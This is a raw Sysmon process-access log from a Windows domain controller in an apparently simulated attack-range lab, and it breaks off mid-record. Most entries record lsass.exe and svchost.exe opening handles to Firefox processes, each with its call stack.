10341000x800000000000000043631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043611Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043610Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043609Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043608Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.764{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla 